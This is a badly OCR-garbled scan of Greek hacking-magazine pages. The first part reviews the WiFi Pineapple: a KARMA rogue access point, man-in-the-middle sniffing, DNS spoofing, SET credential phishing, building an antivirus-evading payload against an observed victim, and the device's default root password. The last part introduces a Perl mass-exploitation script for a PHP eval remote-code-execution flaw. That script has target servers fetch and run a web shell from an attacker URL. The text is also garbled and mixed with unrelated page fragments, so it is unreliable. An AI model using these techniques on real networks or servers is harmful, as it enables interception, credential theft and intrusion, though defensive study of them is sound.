μικρὸς αυτὸς wireless router εἶναι σχεδιασμένος ώστε ν΄ апаута катафа- ουσιαστικἁ έχει 


тікі σε οποιοδήποτε station θέλει να συσχετιστεἰ μαζί του, ισχυριζόμενος ΠΕΤΟΧΕΙ а palos 
Д 1 fi Й Д 5 ' ' ' тат) εΠΙσεση тап 
ότι εἶναι ἑνα ἡ περισσότερα ano τα ασύρματα δίκτυα που γνωρίζει το i! η 


Š П ; in the middle ка! 
station και ζητά να συνδεθεΙ. μάλιστα µε noÀAa- 


A Ç . і K is 22% А SA πλούς αποδέκτες, 
ς πούμε, N.X., От! την προηγούµενη Κυριακή εἰχαμε πάει βόλτα προς την εἶναι σε θέση να 


πλατεία Συντάγματος κι ὁτι απὀ то smartphone µας εἰχαμε μπει στο δη- τους κάνει ἑνα 
μοτικὀ, ανοικτὀ ασύρματο δίκτυο µε ὀνομα FreeWiFi. H διαδικασία σύνδε- соро πράγματα. 


Ν Applications Places System [5 ] 
” х еарріе Control Center - Mozilla Firefox 


File Edit 


(J Pineapple Control Center 


- Ss [Г] 172.16.421 БЕЛЕШ α Ф 


y enabled. | Stop 


DHCP Log 


URL Snarfer 


through SIEMEI 


9) Pineapple Control Сеп... Г-! root@bt: ~ 


2В 


УУ НА@КЕК 
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σης ολοκληρώθηκε επιτυχώς, κάναμε Ta check-ins µας στο Foursquare, 
αμολήσαμε кауа δυο tweets, ελἐγξαμµε και το mail µας. Ano εκείνη την 
ημέρα, To smartphone µας θυμάται το ESS µε SSID то FreeWiFi. Μετά 
ano λίγες μέρες βρισκόμαστε κάπου αλλού, ας πούμε σ΄ Eva πολυκατά- 
στηµα κοντὰ στον Ἅγιο Δημήτριο (ξανά: τα παραδεἰγµατα εἶναι εντελὼς 
τυχαία). Εκεἰ γύρω, που λέτε, υπάρχει κι Eva Pineapple. Тора, αν ο Kå- 
TOXOG TOU δεν ἐχει σηκώσει µια μεγάλη ταμπέλα που να γράφει κάτι σαν 
«υποκλέπτω συνδέσεις WiFi», τότε μάλλον δεν θα έχουμε και πολλούς 
ενδοιασμούς για να χρησιμοποιήσουμε то ὀποιο ανοικτὸ ασύρματο δίκτυο 
εἶναι διαθέσιμο. Ενεργοποιώντας λοιπὀν To WiFi στο smartphone µας, 
екгіуо Ө’ αρχίσει прота να ψάχνει για δίκτυα που ἠδη γνωρίζει. Μεταξὺ 
ἄλλων, θα στείλει και капота probe request frames που θα περιέχουν Eva 
SSID µε ὀνομα PublicWiFi. To Pineapple δεν θα τα αγνοήσει. Θ΄’ απαντήσει 
πρόθυμα ы” Eva probe response frame, που στην ουσία θα φωνάζει κάτι 
σαν «ё, station, εγώ εἶμαι το PublicWiFi που ζητάς, ¿àa να συνδεθούμε, 
θα περάσουμε кала». To τι θα ακολουθήσει εἶναι πλέον φανερὀ: Εμεὶς θα 
συνδεθούμε στο Pineapple -- και ката паса πιθανότητα µέσω αυτού θα 
έχουμε και πρόσβαση στο Internet. O κάτοχος Tou Pineapple, ὁμως, θα 
EXE] εκτελέσει επιτυχώς ша επίθεση МІТМ ка! θα εἶναι σε θέση να βλὲ- 
πει ἦ/και να ελέγχει To traffic µας, κάνοντας, av ἐχει ὀρεξη, Eva осоро 
αταξίες. Ταυτόχρονα, το ἰδιο ενδέχεται να κἀνει και για άλλα stations, τα 
οποία βρίσκονται εκεἰ γύρω κι ἐχουν επἰσης συσχετιστεί µε то Pineapple! 
Πρέπει уа το παραδεχτεἰτε: O attacker βρίσκεται σε ιδιαιτερα προνομιακἠ 
θέση και μάλιστα την EXE! κερδίσει χωρίς να κοπιάσει ιδιαίτερα. Kal το πιο 
τραγικό απ’ Ола εἰναι бт! δεν NAGE καν εκείνος с’ εμάς αλλά εμεὶς πήγαμε 
о” αυτόν! 


Σημαντική παρατήρηση. Μεταξύ των probe request frames που 
θα στείλει το smartphone µας, μερικἁ θ’ αφορούν σε κλειδωμὲ- 
να δίκτυα WEP/WPA/WPA2. То Pineapple δεν θα τα αγνοήσει ка! 
Ө’ απαντήσει µε τα avTioTolxa probe response frames. Όμως то 
πιθανότερο εἰναι OT! θα τα αγνοήσει το λογισμικὀὸ της συσκευής: 
Το γεγονὸς бт! ἑνα δίκτυο ΧΥΖ ἧταν κρυπτογραφημένο ка! тора 
εμφανίζεται ауоікто, θα υποψιάσει то λογισμικὀ κι ETO! θα επιλέξει 
να µη συσχετιστεί αυτόματα µε το δίκτυο -- кі ас θυμάται το XYZ. 


Τι кау то Pineapple va ξεχωρίζει 


Το λογισμικὀ που επιτρέπει σε ша ασύρματη карта δικτύου να παρου- 
σιάζεται σε κάθε station ως то Access Point που αναζητά, ονομάζεται 
KARMA. Παρουσιάστηκε για πρὠτη φορὰ το 2004 απὀ τους ερευνητὲς 
ασφαλείας Dino A. Dai Zovi και Shane A. Macaulay (http://trailofbits. 
com/karma) και σήμερα χρησιμοποιείται κυρίως σε συνδυασμὸ µε TO 
Metasploit, µέσω του λεγόμενου Karmetasploit (ауадотікес οδηγἰες χρἠ- 
σης υπάρχουν στο http://offensive-security.com/metasploit-unleashed/ 
Karmetasploit). 


To Yasager («yes тап», στα γερμανικὰ) εἶναι ша εκδοχἠ του KARMA 
που µπορεί να τρέχει στο OpenWRT firmware και συγκεκριµένα σε Fon 
routers αλλά και σε άλλους, µε συμβατὀ hardware (βλ. http://digininja. 
org/jasager, https://openwrt.org και http://corp.fon.com/en/this-is- 
fon). То бе Pineapple ano κατασκευἠς τρέχει To Yasager, προσφέρει στον 
attacker Eva εὐχρηστο web interface καθὼς και μερικά άλλα εργαλεία, 
та οποία χρησιμεύουν σε επιθέσεις man in the middle. H ἐκδοση Mark III 
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x root@bt: /pentest/exploits/set 
File Edit View Terminal Tabs Help 


root@bt: ~ Ж | root@bt: /pentest/exploits/set Ж root@bt 


] 
[*] Informatio 4111 be displayed to you 
[*] WE GOT A HIT! Printing e output: 
POSSIBLE USERNAME FIELD FOUND: user=100000460473203 

available user_info_ids[0]=100000460473203 


orm id sour 
NAME FIELD FO 


INISHED, HIT CONTROL-C TO GENERATE A REPORT. 


172.16.42.215 - - [28/Jan/2012 20:41:09] "GET / HTTP/1.1" 200 - 
[*] WE GOT A HIT! Printing the output 


form id=efa9 ἀ1146 


Е USERNAME FIELD FOUND 

PASSWORD FIELD FOUN 

>fault_per 

YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT. 


ТЕ © Pineapple Control Cen... [>] root@bt: /pentest/expl... 


Tou Pineapple που προμηθευτήκαμε εμεὶς ουσιαστικά εἶναι ἑνας Alfa AP51 Εικόνα 3 
802.11 b/g wireless router. Έρχεται µε ша κεραία 5абі, έχει ша θύρα Ένα ano та μύρια 
Ethernet για να συνδέεται στο laptop Tou κατόχου του, ενώ συνοδεύεται OJA BORE YAKO” 


ot А A А Қ νει o επιτιθέμενος 
кі апо va battery pack WOTE να μπορεί να χρησιμοποιείται *ка!* εκτὸς στα ανυποψίαστα 


πρἰζας (τροφοδοσία апо υπολογιστή δεν υποστηρἱζεται). Өйната του, είναι 

να υποκλέπτει τα 
Συνεργασία του Pineapple µε то OS του attacker πορεια паоввах 

σης που εχουν σε 
То Pineapple λειτουργεί ως wireless router για та stations που συσχετἰ- διάφορα γνωστά 
ζονται μαζί του, біуоутас τους πρόσβαση στο Internet µέσω του υπολο- ә. 
γιστή (συνήθως laptop) µε τον οποίο εἶναι συνδεδεμένο μέσω Ethernet. Е аам 
Εστιάζοντας στη συμπεριφορά του ως router, το μοντέλο Mark III εἶναι ένα εργαλειἁκι σαν 
προρυθµμισμένο ώστε να ἐχει IP то 172.16.42.1. Μέσω DHCP, στα stations To SET. 


μοιράζει διευθύνσεις ІР ano To 172.16.42.100 Ewe και To 172.16.42.150. 
Ως πύλη για To Internet η συσκευή ἐχει To 172.16.42.42, επομένως η 
карта Ethernet του υπολογιστή στον οποίο συνδέεται πρέπει να EXE! την 
ἴδια διεύθυνση. Στη συσκευασία του Pineapple υπάρχει φυλλάδιο µε οδη- 
γίες για τη ρύθμιση της δικτύωσης като апо Linux ñ Windows, ӘСТЕ 
να Byaivel To Pineapple στο Internet µέσω του υπολογιστή. Ειδικἁ στην 
περίπτωση του Linux η ρύθμιση γίνεται ταχύτατα και πανεύκολα: Αρκεἰ 
ο χρήστης να κατεβάσει Eva script (wifipineapple.com/wp3.sh) και να то 
τρέξει, αφήνοντας τις προεπιλεγμένες απαντήσεις σε ὀλες τις ερωτήσεις 
που εμφανίζονται. Н δε πρόσβαση στο web interface Tou Pineapple γἱνε- 
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ται ano τη διεύθυνση http://172.16.42.1/pineapple. O ἑνας και μοναδικὸς 
χρήστης του Linux που τρέχει το ібіо το Pineapple εἶναι о root και To про- 
καθορισμένο password εἶναι To pineapplesareyummy. Φυσικά, πέρα ano 
то web interface ο κάτοχος Tou Pineapple μπορεί να μπει στο σύστημα και 
μέσω SSH, αποκτώντας πλήρη πρὀσβαση στη γραμμὴ εντολἠς αλλά και 
σε ὁλα τα log files που θα βρει εκεἰ ;) 


Επιθέσεις, επιθέσεις, επιθέσεις 


Κατὰ τη διάρκεια των δικών µας δοκιμών σκὀπιµα τηρήσαμε ша ξεκάθαρα 
ουδέτερη στάση. Συγκεκριµένα, εἶχαμε το ρόλο ενός παρατηρητή ο onoi- 
ος όμως δεν καταγράφει το φαινόμενο και σίγουρα δεν аутібра σε ό,τι 
συμβαίνει. Οἱ δοκιμὲς µας έγιναν κοντὰ στην ἐδρα της Parabing Creations 
και στο κἐντρο της Θεσσαλονίκης, γύρω апо την πλατεία Αριστοτέλους. 
Κατὰ τη διἀρκειἁ τους, ano Eva laptop µε BackTrack Linux και µέσω του 
web interface που προσφέρει то Pineapple Mark ІШ, βλέπαμε να συνδέο- 
ута! πάνω στον wireless router ¿va соро stations: апо Blackberries και 
iPhones έως laptops και PCs. Τα ονόματα nou εἰχαν Ta stations σε µερι- 
кес περιπτώσεις ἦταν ενδεικτικἀ του εἶδους του υπολογιστή, SVO κάτι 
μαρτυρούσαν και για τον ιδιοκτήτη του. Πα παράδειγµα, ἑνα station µε 
hostname το vasiliki-laptop νομἰζουμε бт! δεν αφήνει πολλά στη φαντα- 
σία. 


Μέσα ano то web interface του Pineapple μπορούμε να βλέπουμε та sites 
που επισκἐπτονται ὁσοι το χρησιμοποιούν (URL snarfing), να υποκλὲ- 
πτουµε cookies και passwords που μεταδίδονται σε µη κρυπτογραφημένη 
μορφή (µε τη βοήθεια του ngrep), καθὼς και να πραγματοποιούµε DNS 
spoofing. Αυτὸ το τελευταίο μὰς ανοίγει Eva соро νέες δυνατότητες: 
Ano то να κάνουμε αθῶες πλάκες (π.χ., аут! για то YouTube ο χρήστης 
να φτάνει στο site της Εκκλησίας των Μορμόνων) ἑως και va εξαπολύου- 
нє σοβαρὲς επιθέσεις µε τη βοήθεια εφαρμογών ὀπως εἶναι το SET ἡ το 
Metasploit. 


Ас γίνουμε λἰγο πιο συγκεκριμένοι. Με To DNS spoofing ενεργοποιημένο 
και τη βοήθεια Tou SET που τρέχει στο BackTrack Tou attacker, εἶναι δυ- 
νατὸν να κάνουμε phishing λογαριασμών σε δηµοφιλἠ κοινωνικἁ δίκτυα 
και sites ἡ να παρακινούµε τα υποψήφια θύματα να κατεβάζουν και va 
εκτελούν payloads που τελικά μὰς δίνουν πλήρη πρόσβαση στα συστή- 
ната τους. Αν πάλι καταφύγουµε στο Metasploit ἡ στο πολὺ πιο εὐχρηστο 
Armitage, τότε μπορούμε να ψάχνουμε αυτόματα για γνωστές αδυναμίες 
και µε το που τις βρίσκουμε να εξαπολύουμε, επίσης αυτόματα, то KA- 
τἀλληλο exploit. Πα ἄλλη µια φορά, απὠτερος σκοπὸς εἰναι η απόκτηση 
πλήρους πρὀσβασης στα μηχανήματα των victims. 


Το τι рпорєі να кду о attacker στα υποψήφια θὐματά του περιορἰζεται 
ano τη φαντασία του -- και φυσικά апо την ηθικἠ του. Αν πάντως εἶναι 
υπομονετικὸς, δεν θα βιαστεί. Κάτι που θα μπορούσε να κάνει εἶναι να 
τρέξει то Wireshark στο BackTrack του και να συλλέξει ὁσα περισσότε- 
ρα packets μπορεί. Αργότερα, µε την ἀνεσή του, θα αναλύσει το αρχείο 
που θα "χει προκύψει апо To packet capture και θα εξάγει πολύτιμα ou- 
μπεράσματα για τα υποψήφια θύματα. Κατά τη διάρκεια των δικὠν µας 
δοκιμών, παρατηρήσαμε Eva station µε hostname nou hon μαρτυρούσε 
аркета. Па τον χρήστη του, διαπιστώσαμε τα ακόλουθα: 


ο Ἐμπαινε στο Internet πάνω като τις ἴδιες ὧρες της ημέρας 


е Επισκεπτόταν Ліүо πολύ τα ἰδια sites 
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ο Ос gpapuoyn ἡ oouira ασφαλείας εἶχε εγκατεστημένο Eva προϊόν 
της Symantec 


O συγκεκριμένος χρήστης συνδεόταν каӨе --μα кабӨє-- μέρα στο 
Pineapple. Κάποιος κακὀβουλος θα μπορούσε άνετα να Tov οδηγήσει аут! 
για To Facebook, που επισκεπτόταν καθημερινά, σε µια κλωνοποιηµένη 
σελἰδα του SET, µε στὀχο Φυσικά να υποκλέψει Ta credentials του. Εναλ- 
λακτικά, αν εἶχε το χρόνο και την υπομονή θα κατέβαζε αρχικά ша trial 
εκδοχἠ της σουίτας προστασίας της Symantec και θα την εγκαθιστούσε 
о” ἑνα УМ. Мета, µε τη βοήθεια Tou Metasploit κι ακολουθώντας λίγο 
поло τα βήματα nou περιγράφουµε στο http://deltahacker.gr/2011/03/15/ 
antivirus-bypass, θα ἐφτιαχνε Eva payload που θα ἦταν μη-ανιχνεύσιμο 
ano To antivirus της σουἰτας. Με Aiyo DNS spoofing και Ғауа µε тп βο- 
ἠθεια Tou SET, θα παρακινούσε το θύμα να κατεβάσει και να εκτελέσει 
то payload. Κατὰ паса πιθανότητα To antivirus δεν θα αντιδρούσε κι o 
attacker Ө’ αποκτούσε πλήρη πρόσβαση στο box του θύματος. 


NÀ Applications Places System PL] 


x Pineapple Control Center - Mozilla Firefox 


її View History Bookmarks Tools Help 


Εικόνα 4 
Δοκιμάζουμε то 
Pineapple σε 
ανοικτὀ χώρο -- 
για την ακρίβεια 

σε καφετέρια 
κοντά στην πλατεία 
Αριστοτέλους, στη 
Θεσσαλονίκη. Στη 
φωτογραφία φα!- 
νονται µερικά μόνο 
απὀ τα δεκάδες 
stations που ἔχουν 
συσχετιστεί µε TO 
Pineapple! 


‚ pass through default 


Checking SSID for start of 
Successful a 
Checking SSID for start of 
Successful association of 00:1b:11: 
Checking SSID for start of association, 
Successful association of d f 
Checking SSID for start of ‚р 
Successful association of 30:17:c8 
Checking SSID for start of association, 
Successful association of 00:1b:11 
Checking SSID for start of associat 
ful 
SID for start of 
association of 00:18:de 
ing SSID for start of ciat 
Successful association of cc:08:e0 
Checking SSID for start of associat 
Successful association of 00:1b:11 
Checking SSID for start of associat 
Successful association of 00:1b:11 
Checking SSID for start of associat 
Successful association of 00:1b:11: 
Checking SSID for start of associat 
Successful association of 00:1b:11: 
ng SSID for start of associat 
Successful association of 00:1b:11 
Checking SSID for start of as 
Successful association of 4 
Checking SSID for start of 
ul association of 4! 
SSID for start of as 
Successful association of 74:a Н 
Checking 5510 for start of association, 
Successful association of 00:1b:11 
Check SSID for start of 
Successful association of 
Checking f art of 
Successful 
Checking D for start of association, pass through ouze 
Successful association of 34:51:68 
cling ССТП far etart nf seencistinan 


ΓΙ root@bt: ~ 


, pass through ault 
, pass through default 
pass through PL 
through PL 
through default 
through default 
through cityc 
through int 
through default 
through default 
through default 
through default 
through default 
through int 
through tipo 
through Wir 
through default 
s through PAID 


through default 


nace throunh dafaul+ 


©) Pineapple Control Cent... 
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Εικόνα 5 
Орібоутас ἑνα 
ανοικτὀ ασύρματο 
δίκτυο µε περ!- 
εργο ὀνομα στις 
συσκευὲς µας, 
арүдтера εἰναι 
εὐκολο να αντι- 
λαμβανόμαστε την 
ύπαρξη Pineapples 
στην περιοχή. Στη 
φωτογραφία, ο ка- 
τοχος ενός iPhone 
έχει φτιάξει στη 
συσκευή του Eva 
ανύπαρκτο ασύρ- 
µατο δίκτυο µε 
SSID то <Danger! 
Pineapples 
Detected!» (χωρίς 
τα εισαγωγικά). Ap- 
γότερα, ανοίγει то 
WiFi και στη λίστα 
µε та ονόματα των 
γειτονικών Access 
Points βλέπει 

ένα µε ὀνομα « 
Danger! Pineapples 
Detected!». 

Έτσι, εἶναι ката 
9999128900 σίγου- 
рос ὁτι στην пєрїо- 
Xñ υπάρχει κάποιος 
HE то Pineapple 
του! 


21:46 
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Μέτρα προστασίας 


Мета τα προηγούμενα νομίζουμε OT! εἶναι προφανὲς: Οφείλουµμε να pepi- 
μνήσουμε WOTE καμία апо тіс συσκευὲς µας να µη συνδέεται αυτόματα σε 
ασύρματα δίκτυα, ακὀµη κι αν εἶναι γνωστά ἠ/και θεωρούνται ασφαλή. 
Αλλά ας εἰμαστε ρεαλιστὲς. Ελάχιστοι θα το κάνουν AUTÒ -- κι εμείς TOU- 
λάχιστον δεν θα εἰμαστε ano εκείνους :) Αν µη τι ἄλλο, όταν γυρἰζουμε 
σπἰτι θέλουμε у’ ανοίγουμε то laptop кі ато να συνδέεται αυτόματα στον 
wireless router µας. 


Πάντως υπάρχει Eva τρικ UNEP της προστασίας µας που εύκολα μπορού- 
HE να εφαρμόσουμε: Ορἰζουμε Eva νέο, ασύρματο δίκτυο στο laptop ἡ/ 
και στο smartphone/tablet, το οποίο δεν εἶναι κρυπτογραφημένο κι ἐχει 
буора που ката паса πιθανότητα *dev* υπάρχει σε κανένα алло Access 
Point Εκεἰ Έξω (TM). Ιδού тріп παραδείγματα τέτοιων ονομάτων: 


Danger! Pineapples Detected! 
If_UC_this_scream_like_crazy 
Now_UC_me_now_Ure_dead 


Αν αργὀτερα ανοίξουμε то WiFi της συσκευἠς και δούµε δίκτυο µε буора 
ἰδιο р’ εκείνο TO περἰεργο που έχουμε ορἰσει, τότε μπορούμε να εἰμαστε 
βέβαιοι бт! τουλάχιστον Eva Access Point της περιοχἠς εἶναι Pineapple! 


Κάτι ἄλλο που οφείλουμε να προσέχουμε --ιδιαίτερα ὀποτε συνδεόµαστε 
σε δημόσιο ασύρματο δἰκτυο--, εἶναι να µην κάνουμε πουθενὰ login. Τις 
φορὲς που χρειάζεται, εἶναι σημαντικὀ уа βεβαιωνόµαστε дті το login στο 
απομακρυσμένο σἴτε/υπηρεσία γίνεται µέσω ασφαλούς συνεδρίας HTTPS, 
η οποία δεν біаркеі *роуо* για To login (το session cookie, δηλαδὴ, επι- 
στρἐφεται επἰσης μέσω HTTPS). 


Υπάρχει τέλος και η οδός του VPN tunneling: Ανεξαρτήτως του пос ἡ του 
ano nou συνδεόµαστε online, όλη ανεξαιρέτως η δικτυακἠ µας κίνηση 
θα διέρχεται µέσα апо Eva асфадес, κρυπτογραφημένο κανάλι, το οποίο 

υφίσταται апо τη συσκευἠ ἑως κάποιον VPN server nou 


вв%®шъ ἔχουμε UNO τον ἐλεγχὸ µας -- ἡ τέλος πάντων εµπιστευ- 


и... СОЅМОТЕ = 


Settings Wi-Fi Networks 


ὁμαστε απόλυτα. Αναλόγως Tou VPN server, ἰσως να µην 
εἶναι κατάλληλος για κάθε συσκευἠ. Μπορεί, π.χ., уа Kå- 


νει για laptops αλλά ὀχι για iPhones. Ἐχετε πάντως τη 


[sma гоч б δυνατότητα va στήσετε ἑναν тора, εντελώς δωρεάν, 
ακολουθώντας τον αναλυτικὀ οδηγό (στα αγγλικά) στο 
Choose а Network] Parabing: http://parabing.com/?p=839. 
( Αν το στήσιμο ενὸς VPN server сас φαίνεται еубіафе- 
ΕΕ... а= © ρον εγχεἰρηµα, πείτε το µας єїтє µε email στο talk2us@ 
А deltahacker.gr εἶτε µε σχετικὀ σχόλιο κάτω απὸ την 
! = 
ар ее ΤΘ εισαγωγἠἡ αυτού του άρθρου, στο site του περιοδικού 
(deltahacker.gr). Εναλλακτικά, µπορείτε να επικοινωνἠ- 
i] - 
ΓΉΠ Box a a= © сете μαζὶ µας µέσω Twitter (twitter.com/deltaHacker) 
қ ñ Facebook (facebook.com/deltaHacker). Αν δούμε бт! 
internet = © ; А ; у ; 
хб υπάρχει αρκετὸ ενδιαφέρον θα επανέλθουμε στο Оло 
¥ Northern Outpost а= © Өёна δείχνοντας πώς στήνουμε ἑναν OpenVPN server 
ano την αρχἠ, ο опоіос θα “уа! κατάλληλος για µια £u- 
ОТЕ = а= © ρύτερη γκάμα συσκευών σε σχέση p’ εκεϊνον που oTñ- 
$ VOUHE στο άρθρο Tou Parabing. 
Other... > 
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То δικό σας εργαστήριο µε ro VirtualBox | deltaHacker 


ш 


ПЕЗ КӘСІПШІЛІГІ 


Παραδεχτείτε то: Δεν εἶναι σκέτη πώρωση ο κόσμος των εικονικών μηχανών; Τύφλα να 


"ха. το Matrix, δηλαδή DeltaHacker on Facebook 


Λήψη κι εγκατάσταση του VirtualBox 

Av και το VirtualBox διατίθεται για πολλά host OSes (είδατε; αμέσως να 
χρησιμοποιήσουμε τη σχετική ορολογία), στην παρούσα δημοσίευση επιλέγουμε το 
δημοφιλέστερο όλων, που είναι τα Windows. Πάντως το περιβάλλον εργασίας του 
VirtualBox εἶναι ίδιο για κάθε host OS, γεγονός που στην πράξη σημαίνει ότι όπως 


АГ 
Φτιάχνουμε/διαχειριζόµαστε ένα VM κάτω από Windows, ακριβώς µε тоу ἴδιο τρόπο то ΚΕ али р 
х ó ; h К 
φτιάχνουμε/διαχειριζόµαστε και κάτω από Linux, κάτω από Мас OS X κλπ. Δείτε то рр 
п 


1,949 people like DeltaHacker 


screencast που ακολουθεί. 


w Στο μεταξύ, πάλι т ἀνερά µου 
ἔγραιψα, K. o λόγος που σταμάτησα δεν είναι. 
επειδὴ Bev είχα τι va γράψω, αλλά επειδή. 
ГЕМЕ το τεύχος! 


Hacker Χμ. Χιονίζει στην Καλαμαριά. 
Μάλλον περί καλοστηµένης απάτης 0а. 
πρόκειται, Καλό! 


Πολύ κ 
teasing από τον 


ғала 


resp tv τεύχη) 


Αρχική ρύθμιση του VirtualBox 
Αφού ολοκληρωθεί η εγκατάσταση του VirtualBox και πριν φτιάξουμε το πρώτο 
καλό εἶναι να ρίξουμε µια ματιά στις βασικές επιλογές της εφαρμογής. Θα 
ευκαιρία να εγκαταστήσουμε και το extension pack, то 

υποστήριξη USB 2.0 και δυνατότητες ROP. Παρακολουθ! 


96/02/2012 17 


ти | dehaHacker 


—— 


Toph 
оріс» Posts Freshnes Ὄνομα χρήστη 
ss 
“wénamas τέλος D 7 рз 
Κωδικός. D 
a [ 
еге οδόν жаң š 
κάνα Beh beaa Кас Ve µε θυι а 
тд кетем) %ош Ете іні 
"ζουμε 3 Εργραφή 
у Χάσατε τον кава ong 
RG, στιαζοι x< 135 
тб διάφορα Grek Л, е, w 
διάφορα ζητήματα nouga ка. = а 


2777 


є оуауе, 
Όλους “¿oon 20 ευρῷ ἔχεις 3 
Yanaq qas aa την τύχη ооу. “C 300” прос 
аш δὲν отара yaya 
кетте Όποιος сэс πει το 0 τέχνη πό τον η, ἴσνοσελιδες 
τῶος αντίθετου Po 1 Ἐς σελιδες Web Mark 
© ДА з 109; Болна Гози ο 


Aerators Google 


Ἄρθρα 

т Мазок авад 
Beto сто Επίθεση yer emg 
ыма б 00е тру 
= лелер 


тақ, γιατί Bey 


Πλήρη άρθρα που συμπληρώνουν το περιοδικό. Ta εβδομαδιαία µας 
video casts [έρχονται, έρχονται]. Ολόκληρα blasts from the past. 
Τα βίντεο and та live streams. Τα πάντα ενδιαφέροντα forums. To 
σημεῖο συνάντησης για τους φίλους του περιοδικού. H πιο ζωντανή 


κοινότητα και οι πιο ανήσυχοι, δημιουργικοῖ χρήστες! 


deltahacker.gr 


What have you hacked for me lately? 
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Тіс προάλλες, καθώς περιπλανιόμουν στο exploit-db.com πίνοντας то 
Φραπεδάκι µου, ¿neoa πάνω στο «PHP Support Tickets v2.2 Code Exec» 
(www.exploit-db.com/exploits/17822). Μου φάνηκε еубіафероу και σαν 
περἰεργο πλάσμα που εἶμαι апо την φύση µου, εἶπα να το ψάξω καµπόσο. 
Δεν θα σας πω ψέματα! H συγκεκριμένη ευπάθεια και η εκμετάλλευσή 
της εἶναι παρόμοιες µε αυτὲς που παρουσιάστηκαν στο 10 τεύχος του 
deltaHacker, στο θέμα «Μίνι Διαγωνισμός СТЕ». Па όσους δεν θυμούνται, 
να πούμε бт! εξαιτίας µιας ευπάθειας στο αρχείο tiki-graph_formula.php 
ἠταν uvat η εκτέλεση εντολὠν στον Server, µέσω EVOG browser καὶ 
ενὸς κατάλληλα κατασκευασμένου URL. Στην εφαρµογἡ Support Tickets, 
το ευπαθὲς κομμάτι κὠδικα βρίσκεται στο αρχεἰο /classes/GUI/abstract. 
GUI.php και εἶναι το ακόλουθο: 


public function getPageName() {return eval('return ΡΗΡΣΤ _ 
PAGENAME_' . strtoupper($this->page) . ';'); } 


Н εφαρµογἠ καλεί τη συνάρτηση eval, χωρὶς να φιλτράρει σωστά TO user 
input. Με αυτόν τον τρόπο, το κατάλληλο input апо πλευράς του επισκὲ- 
nt μπορεὶ να πετύχει την απομακρυσμένη εκτέλεση εντολών (remote 
command execution) και ара καθιστά то server ευάλωτο. 


Σε αυτὸ το άρθρο παρουσιάζουμε Eva προγραμματάκι γραμμένο σε Perl, 
το οποίο αυτοματοποιεί την επἰθεση σε server που πάσχουν апо τη συ- 
γκεκριμένη αδυναμία. Το πρὀγραμµα δέχεται µια Ліота ano site κι ελέγχει 
αν το καθένα εἶναι ευπαθές. Αν βρεθούν ευπαθὴ site στη λίστα, napou- 
σιάζονται οι κατάλογοι nou xouv «χαλαρά» δικαιώματα κι ο χρήστης 
καλείται να εισαγάγει τρία στοιχειά: 


ο Τον κατάλογο οπού то πρὀγραμμα θα προσπαθήσει м” ανεβάσει то 
shell (για την ακρίβεια то πρὀγραμμα δεν θ’ ανεβάσει τίποτα, алла 
θα κάνει τον server уа το κατεβάσει μόνος του :D) 


ο Το ὀνομα που θα χει το shell, όταν καταλήξει στον server-oTóxo. 
ο Το URL που βρἰσκεται To shell -- ano εκεἰ θα το κατεβάσει о server! 


Περιττὸ να πούμε πως αν το shell «ανέβει» στο στὀχο επιτυχώς, то NPO- 
γραµµα δοκιμάζει να το εκτελέσει. Λογικὀ δεν εἶναι; 


Mnopeite να κατεβάσετε τον κὠδικα апо το http://bit.ly/autoVulnSearch 
(μέσα στο ZIP εἰναι το αρχείο xploit.pl). Πριν συνεχίσετε την ανάγνωση 
θα сас προτείναµμε να ανοίξετε το αρχεἰο xploit.pl σε ¿vav text editor. Στις 
επόμενες σελίδες θα αναλύσουμε το πρὀγραµµα γραμμὴ προς γραμμὴ. 


Γραμμές 2-10. Στη γραµµή 2 δηλώνουμε τη λειτουργική μονάδα 
(module) που χρησιμοποιεί το πρὀγραμμά µας. Δουλεία της εἶναι уа апо- 
στέλλει αιτήματα στο web. Στη γραμμή 4 το πρόγραμμα εκτυπώνει στο 
τερματικὸ τη συμβολοσειρά «Enter Targetlist> και στη γραμμή 5 αναμένει 
ano το χρήστη να πληκτρολογήσει το ὀνομα του αρχείου, µε τη λίστα των 
στόχων. Εδὠ να διευκρινίσουµε πως ὁταν η Perl συναντά την ἐκφραση 
<STDIN>, περιμένει εἰσοδο апо το πληκτρολόγιο και διαβάζει τους £l- 
σερχόµενους χαρακτήρες EWS OTOU ο χρήστης πατήσει To [Enter]. Όταν 
συμβεί ауто, η targetlist (το αρχείο που πληκτρολογήσαμε) καταχωρείται 
στη HETABANTN $sites και αφαιρείται ο χαρακτήρας της νέας γραμμὴς (то 
τελευταίο [Enter] nou πατήθηκε), μέσω της συνάρτησης chop. Στην Perl, 
όταν θέλουμε να ανοἰξουµε Eva αρχείο για ανάγνωση ἡ ἐγγραφη πρέπει 
να χρησιμοποιήσουμε ¿va filehandle. Αυτὸ γίνεται µέσω της συνάρτησης 
open. H open δέχεται ως прото ὀρισμα Eva filehandle και ως δεύτερο ὁρι- 
она ша διαδρομή αρχείου ἡ µια μεταβλητή που περιέχει τη διαδρομή και 


Πυταματοποιημένη αναζήτηση αδυναμιών 
УМ УУУУҚ УУҰУХ%УҰ>У6%", ,УУҰ 7 У УУУУҰУҚҰХГҠУИЬ  7ҰҮ«<%«ҰҮ  УХХХҰҰЙЛ 


то ὀνομα ενὸς αρχείου. Αν δεν npoodiopiotei η διαδροµἠ пара µόνο то 
ὀνομα αρχείου, η open θα προσπαθήσει να ανοἰξει το αρχείο апо τον τρὲ- 
χοντα κατάλογο. H δε συνάρτηση die χρησιμοποιείται για να διακόψει την 
εκτέλεση του προγράμματος σε περίπτωση κάποιου σφάλματος και για va 
εμφανίσει κἀποιο μήνυμα του τύπου «κάτι πῆγε στραβά». Έτσι, η γραμμή 
6 μεταφράζεται ως «άνοιξε την targetlist ($sites) µε буора λαβἠς αρχείου 
το LIST -- ñ τερμάτισε το πρὀγραμμα εκτυπώνοντας το μήνυμα στα δεξιὰ 
της die». Στη γραμμὴ 7, τα περιεχόμενα της <LIST> αντιγράφονται στον 
πίνακα @list, ενώ στη γραμμὴ 8 κλείνει το filehandle LIST. Πλέον, όλα τα 
site που περιεἰχε το αρχείο (εκείνο που µας ζητήθηκε να καθορίσουμε στη 
γραμμὴ 5) περιέχονται στον піуака @list. Στη γραμμὴ 10 ορἰζεται о user 
agent και καταχωρείται στη μεταβλητή $browser. H μεταβλητή $browser 
εἶναι εκεἰνη που θα στέλνει κάθε VEO αἰτημά µας προς то web. Στο εξἠς, 
θα την αναφέρουμε апла ως browser. 


Γραμμὲς 12-17. Στη γραμμὴ 12 ξεκάνει ἑνας βρόχος foreach και η pE- 
